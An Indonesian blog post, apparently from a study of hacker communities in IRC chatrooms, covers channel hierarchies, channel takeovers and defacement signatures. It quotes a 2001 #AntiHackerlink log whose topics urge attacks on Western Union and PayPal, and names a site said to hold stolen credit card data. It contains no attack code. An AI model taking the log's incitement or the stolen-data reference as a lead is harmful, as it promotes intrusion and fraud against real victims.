Founder adalah pemegang akses tertinggi dalam sebuah chatroom dan hanya dipegang oleh satu orang saja. Seorang founder bisa mengangkat SOP dan AOP. SOP bisa mengangkat AOP. Pengangkatan para SOP dan AOP tersebut memerlukan pendekatan kepada atasaanya. Karena tidak jarang para chatters terpisah antar negara dan sama sekali tidak pernah bertemu satu dengan yang lainnya secara face-to-face. Pengangkatan jabatan tersebut harus berdasarkan kepercayaan dan tidak jarang dengan melakukan lobi-lobi.

Kembali ke pendapat Hillery, syarat penting terjadinya sebuah komunitas maya adalah adanya suatu persamaan yang mengikat mereka pada kelompok tersebut dan antar sesama anggota kelompok, serta mereka berbagi area tertentu dalam jangka waktu tertentu. Para anggota kelompok hacker di chatroom memiliki persaman yang mengikat yaitu anggotanya sama-sama menyatakan dirinya sebagai hacker dan memiliki tujuan untuk melakukan hacking. Mereka juga berbagi area kekuasaan tertentu dalam jangka waktu tertentu. Area tersebut ialah sebuah chatroom.

Konsep area dalam chatroom ini tidak berbeda jauh dengan konsep area kekuasan dalam dunia nyata. Dalam chatroom pun ada istilah penguasa lahan (operator), perebutan lahan (channel takeover) dan intimidasi area (flooding). Ada kalanya para anggota sebuah chatroom melakukan "serangan" ke chatroom lain. Selain itu dikenal pula istilah "meminta jasa keamanan" kepada operator yang ahli, biasanya adalah operator di sebuah chatroom besar, yang dalam dunia nyata disebut sebagai God Father. Bagi chat room kecil atau yang baru memiliki anggota sedikit, tidak jarang diganggu oleh pihak yang iseng. Operator chatroom besar rata-rata memiliki pengalaman dan pengetahuan yang lebih baik dalam mengatur sebuah channel dan mengatasi permasalahan yang timbul.

Operator tersebut kemudian diangkat sebagai SOP oleh founder chatroom kecil dan diajak untuk bergabung dalam channel kecil tersebut, walapun hanya sekedar meletakkan nickname saja. Dengan adanya God Father dari chatroom besar tersebut, maka tingkat gangguan terhadap chatroom kecil tersebut dapat dikurangi. Setidaknya membuat pihak yang ingin mengganggu tersebut harus berpikir dua kali, karena bisa saja dia yang terkena serangan balasan atau dicekal untuk masuk ke chatroom lain yang dipegang oleh God Father tersebut.

Salah satu ciri khas yang membedakan antara hacker yang tidak bergabung dengan suatu kelompok hacker tertentu dengan hacker yang memilih bergabung adalah dari kebiasaan meninggalkan "catatan" dalam tampilan sebuah situs yang telah dimodifikasi oleh hacker tersebut. Bagi hacker tanpa kelompok, dia hanya meninggalkan catatan atas nama nickname atau inisial hacker tersebut.

Salah satu contohnya adalah ketika Fabian Clone pada hari Jumat tanggal 24 Mei 2000 menembus sistem sekuriti situs Indofood.co.id dan Rekayasa.co.id, dia hanya meninggalkan pesan-pesan yang diakhiri dengan inisial "F.C.". Sedangkan bagi hacker yang berkelompok, dia akan menuliskan nama kelompoknya. Salah satu contohnya adalah ketika hC- pada hari Kamis tanggal 16 Mei 2000 menembus sistem sekuriti situs PLN-Jawa-Bali.co.id, dia meninggalkan pesan-pesan tertentu sekaligus mengucapkan salam antara lain kepada rekannya dari kelompok hacker AntiHackerlink.


Di dalam chatroom, kerap terdapat ajakan-ajakan eksplisit atau motivator-motivator untuk melakukan hacking. Salah satu contohnya adalah logs chatroom #AntiHackerlink di bawah ini :


===== Start Logs =====
Session Start: Wed Mar 21 12:38:10 2001
[12:38] *** Now talking in #antihackerlink
[12:38] *** Topic is '__4, http://www.multysistem.it/, http://www.nicastroebarone.it/ ,http://www.salvatoremirmina.it/ http://www.pensionescala.it/sakitjiwa.txt, http://www.roseeroselline.it/ http://www.cavi-vivai.it/ _ _12New TargeT _www.westernunion.com www.paypal.com _> yg bisa di akui jadi hacker sejati_ <- both of them _'
[12:38] *** Set by chikebum on Wed Mar 21 11:56:49
[12:38] #antihackerlink url is pimp.goes.to.hell.with.the.support.from._antihackerlink.org_
---cutted---
Session Time: Thu Mar 22 00:00:00 2001
---cutted---
[07:24] *** Wagimin changes topic to '_ANTIHACKERLINK IS BACK !!!_ | The Hot News seen www.westernunion.com http://www.detik.com/net/2001/03/21/2001321-114641.shtml ! || Last target www.paypal.com || [eF!] My Gift for #ANTIHACKERLINK :: http://hacked.centralbankasia.com/ [eF!]_'
---cutted---
[07:24] ANTIHACKERLINK IS BACK!
[07:24] ANTIHACKERLINK IS BACK!
===== End Logs =====


Perbedaan jam antara informasi logs tersebut dengan WIB adalah +7. Dari logs tersebut bisa dijelaskan bahwa pada pukul 19.38 WIB, Chikebum memasang topic di #AntiHackerlink yang intinya berisi ajakan atau motivasi untuk melakukan hacking ke situs Western Union salah satunya. Pada pukul 06.19 WIB keesokan harinya, dotcom- mengirimkan e-mail ke penulis yang mengatakan bahwa dia dan eF73 berhasil masuk ke server WesternUnion.com. Siang harinya berita bobolnya server Western Union tersebut dimuat oleh situs www.detik.com. Kemudian pada pukul 14.24 WIB, Wagimin, alias eF73, memasang topic di #AntiHackerlink tentang keberhasilan eF73 dan dotcom- menembus server Western Union, sekaligus memasang alamat situs berita dari Detikcom yang memberitakan keberhasilan mereka.

Sedangkan alamat situs http://hacked.centralbankasia.com merupakan salah satu tempat curahan data-data kartu kredit dari toko buku online Barners & Nobles yang sistemnya baru saja ditembus oleh AntiHackerlink. Kedua peristiwa tersebut membuat C1sc0- "bersorak" gembira. Hal tersebut merupakan contoh adanya kemungkinan melakukan tindakan persuasif atau memotivasi orang lain di dalam chatroom. Salah satu kebanggaan hacker yang membentuk kelompok maya di chatroom adalah ketika hasil hackingnya dipasang sebagai topic channel, sehingga setiap pengunjung chatroom tersebut pasti membaca isi topik. Terlebih lagi apabila di dalam topik tersebut adalah alamat situs tempat berita keberhasilannya itu dimuat.

Saling memotivasi dan saling memberikan salut merupakan hal yang lumrah dan kerap terjadi di chatroom hacker. Bukti lain bahwa chat room dapat menjadi sarana belajar belajar atau motivasi perilaku hacking adalah ketika hC-, seorang hacker Indonesia yang didenda Rp 150 juta oleh pengadilan Singapura pada tanggal 30 Agustus 2000 karena membobol jaringan komputer di Singapura, oleh Kepolisian Singapura dirinya dinyatakan menggunakan chatroom untuk mempelajari teknik penyusupan ke sebuah jaringan komputer.

Kita kembali kepada konsep Liu tentang syarat eksistensi sebuah komunitas maya., khususnya dalam hal konsistensi pemunculan anggota dan adanya interaktifitas pesan simulasi aksi. Makna pemunculan anggota di sini adalah keberadaan individu dalam sebuah area tertentu secara konsisten. Keberadaan individu tersebut dimanifestasikan dengan keberadaan sebuah nickname yang digunakan secara tetap pada sebuah chatroom secara regular dalam jangka waktu tertentu. Sedangkan interaktifitas pesan simulasi aksi adalah keberadaan bahasa-bahasa verbal dalam bentuk teks atau tulisan yang memiliki makna atau dimaknai sebagai sebuah aksi yang benar-benar dilakukan.

Jika kedua hal ini digabung, maka maknanya adalah pemunculan nickname secara konsisten dalam sebuah chatroom tertentu yang antara lain dapat melakukan simulasi aksi. Simulasi aksi baru memiliki makna apabila dilakukan secara real-time kepada lawan bicara. Ungkapan "saya mencium kamu" misalnya, akan memiliki makna yang berbeda ketika disampaikan melalui chatroom dan ketika melalui e-mail.

Dalam e-mail, rasa dan makna kehadiran "pada saat itu" menjadi tidak penting. Kejadian bisa terjadi kapanpun (tidak real-time) dan dimanapun (tanpa harus bertemu di satu tempat tertentu). Kejadian apapun yang di dalam milis, termasuk simulasi aksi tersebut, tidak akan memiliki makna seperti dalam chatroom.

Dalam chatroom, rasa dan makna kehadiran menjadi sangat penting. Karena tanpa hadir dalam satu saat yang sama dan tempat maya yang sama, komunikasi dan interaksi tidak akan terjadi. Hal tersebut menjelaskan mengapa simulasi aksi tersebut dapat sedemikian bermakna di chatroom. Kejadian maupun simulasi aksi tersebut benar-benar "dilakukan" dan "terjadi" pada saat itu.

Makna "saya mencium kamu" di dalam milis bisa jadi bermakna seperti sekedar rayuan, sekedar angan, obsesi maupun bayangan. Tetapi jika di chatroom "saya mencium kamu" bisa bermakna "saya saat ini sedang mencium kamu" dan benar-benar tengah terjadi (secara virtual atau setidaknya dalam benak pelaku). Untuk itulah maka konsep-konsep tentang cybersex lebih mengacu kepada chat, ketimbang e-mail. Komunikasi interpersonal akan terasa lebih personal, intensif dan menyentuh bila terjadi secara realtime.

Berdasarkan beberapa hal tersebut di atas, ikatan emosi antar anggota sebuah chatroom jauh lebih kuat ketimbang antar anggota sebuah mailing-list. Hal ini menjelaskan mengapa walaupun para hacker banyak berlangganan mailing-list security, eksistensi mereka tetap dimanifestasikan dalam chatroom. Sekedar contoh, yang kerap disebut sebagai anggota hacker Jasakom bukanlah mereka yang tergabung dalam mailing-list Jasakom, tetapi lebih kepada mereka yang secara konsisten muncul di chatroom #Jasakom.

Klik disini untuk melanjutkan »»
 
Contact info submission url: oookezone.blogspot.com/ site_owner: address1:pepe rt 03 trirenggo address2: city: bantul state: yogyakarta country: indonesia postal_code: 55714 phone_number: +62817277309 display_email: site_name: oookezone site_description: javanese annuity
my blog about javanese annuity and tutorial all oookezone
Namablogkamu is proudly powered by Blogger.com | Template by o-om.com